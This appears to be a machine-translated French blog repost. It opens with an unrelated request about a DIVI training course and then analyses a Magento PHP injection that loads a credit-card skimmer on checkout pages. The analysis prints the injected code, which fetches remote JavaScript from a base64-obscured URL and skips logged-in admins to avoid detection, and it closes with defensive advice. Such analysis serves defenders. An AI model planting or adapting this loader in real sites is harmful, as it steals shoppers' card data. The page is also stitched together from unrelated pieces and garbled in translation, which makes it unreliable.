Je souhaite obtenir des informations sur une formation complète concernant le thème DIVI dispensé
par un organisme de formation certifié par l’état.
Que la formation soit finançable par mon CPF (idéalement) ou autre


Un propriétaire de site Web Magento était préoccupé par les logiciels malveillants et a demandé de l’aide à notre équipe. Après enquête, nous avons constaté que le site Web avait une injection PHP dans l’un des fichiers Magento: ./app/code/core/Mage/Payment/Model/Method/Cc.php

...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
              if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
                  if(!isset($_COOKIE["adminhtml"])){
                      echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
                  }
              }
          }

Pour rendre la détection plus difficile, le skimmer JavaScript est chargé à l’aide de la fonction PHP file_get_contents et obscurcissez l’URL avec base64.

En tant que niveau supplémentaire de manœuvre d’évitement, le skimmer n’est chargé que si deux conditions sont remplies: Lorsque le visiteur est sur la page de paiement et quand le visiteur est Pas sur le site Web de Magento comme connecté Administrateur Utilisateurs.

Le code PHP vérifie ces conditions en recherchant la chaîne de texte dans l’URI demandée par le visiteur. « / onestepcheckout / index /Avec strpos. Il est également vérifié si le visiteur en a un adminhtml Cookie qui indique si le visiteur est connecté en tant qu’administrateur sur le site Magento.

Injection PHP Magento

Les skimmers de cartes de crédit sont un problème constant pour les sites de commerce électronique. Non seulement ils ont un impact sérieux sur vos sites Web, mais ils exposent également les clients à des risques d’usurpation d’identité ou de fraude par carte de crédit, ce qui peut finalement entraîner des problèmes de conformité PCI.

Et tandis que les mauvais acteurs continuent de mettre à jour leurs logiciels malveillants avec de nouvelles techniques et des manœuvres évasives, il y en a une Nombre d’étapes Les sites Web de commerce électronique peuvent protéger leurs utilisateurs et leurs sources de revenus.

Pour réduire le risque et prévenir les infections, installez les derniers correctifs de sécurité dès qu’ils sont disponibles Site Web durci Politiques et effet de levier a Firewall d’applications Web pour corriger virtuellement les vulnérabilités connues.



Source link

Recent Posts